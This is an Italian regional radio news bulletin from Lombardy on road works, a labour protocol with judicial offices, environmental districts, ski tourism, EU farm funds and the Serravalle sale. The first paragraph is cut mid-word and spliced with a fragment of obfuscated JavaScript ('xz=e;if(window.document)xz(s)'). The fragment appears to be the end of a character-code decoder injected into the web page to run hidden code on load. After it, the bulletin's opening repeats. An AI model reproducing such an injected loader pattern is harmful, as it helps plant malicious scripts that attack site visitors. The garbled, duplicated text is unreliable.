Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

Inaugurato ieri il raddoppio della prima tratta della Paullese tra Crema e Dovera, alla presenza fra gli altri del presidnete della Regione Formigoni. Il tratto aperto al traffico, con due carreggiate a doppia corsia per senso di marcia, è lungo 7,2 chilometri, sugli oltre 13 che comp(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 12 Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

Inaugurato ieri il raddoppio della prima tratta della Paullese tra Crema e Dovera, alla presenza fra gli altri del presidnete della Regione Formigoni. Il tratto aperto al traffico, con due carreggiate a doppia corsia per senso di marcia, è lungo 7,2 chilometri, sugli oltre 13 che compongono il lotto cremonese della strada, ed è stato portato a termine con 40 giorni di anticipo rispetto al cronoprogramma previsto. Il costo per la realizzazione di questi 7,2 chilometri è stato di 64,2 milioni di euro ed è stato finanziato da Regione Lombardia con 60,065 milioni, dalla Provincia di Cremona con 4 milioni di euro e dallo Stato con 135.000 euro.
 
E' stato firmato a Palazzo Lombardia il protocollo d'Intesa per la realizzazione del “Progetto politiche attive del lavoro presso gli uffici giudiziari lombardi”. Il documento è stato siglato con le Corti d'appello di Milano, di Brescia e le rispettive Procure e prevede azioni di riqualificazione in collaborazione con gli uffici giudiziari lombardi per accogliere nelle proprie sedi i lavoratori colpiti dalla crisi. Il presidente della Regione, Roberto Formigoni, spiega le azioni messe in campo

(AUDIO)

Regione Lombardia, per rendere sempre più proficue e aderenti alle molteplici peculiarità del territorio le misure messe in campo a tutela e sostegno dell'ambiente e del paesaggio, è pronta a varare i Distretti ambientali. Si tratta di ambiti territoriali, in cui saranno messe in campo modalità specifiche di intervento che varieranno da zona a zona. Lo ha annunciato ieri l'assessore ai Sistemi verdi e Paesaggio Leonardo Salvemini durante il convegno 'Paesaggio. Un valori condiviso: la qualità dei territori periurbani', che si è svolto a Palazzo Lombardia.

'Vieni in Lombardia!' E' questo lo slogan utilizzato all'assessore regionale al Commercio, Turismo e Servizi Giovanni Bozzetti all'incontro che si è svolto ieri, a Palazzo Pirelli, con gli operatori dei comprensori sciistici del nostro territorio. La prima campagna promozionale della Lombardia partirà per Natale e sarà rivolta sia a un target nazionale che a uno internazionale, con pacchetti turistici in grado di soddisfare le esigenze di ogni tipo di clientela. Particolare attenzione sarà rivolta anche ai residenti lombardi. L'appuntamento è a dicembre in piazza Città di Lombardia, insieme a operatori, ristoratori, maestri di sci, albergatori, gestori di impianti di risalita, per promuovere le nostre montagne e i nostri centri sciistici.

Parliamo ora di agricoltura ed Europa. Per Giuseppe Elias, assessore all'Agricoltura di Regione Lombardia, il fatto che l'Unione Europea non abbia raggiunto l'accordo sul proprio bilancio può essere l'occasione per rivedere entità e distribuzione dei fondi per la Pac, la politica agricola comune, per la quale era previsto un taglio da 25 miliardi di euro per i prossimi anni

(AUDIO)

"Sono fortemente preoccupato per il fatto che la gara per la vendita di Serravalle sia andata deserta". Lo dichiara l'assessore alle Infrastrutture e Mobilità della Regione Lombardia Andrea Gilardoni.  "Mi chiedo - continua l'assessore - come l'esito negativo di oggi inciderà sul prosieguo delle grandi opere, come Pedemontana e Tem. Il mio auspicio è che questa situazione venga sbloccata rapidamente in modo tale che la Provincia di Milano possa adempiere ai propri impegni così da proseguire speditamente nella conclusione delle opere avviate, nell'interesse dei cittadini lombardi".

Ed è tutto, grazie per l’ascolto.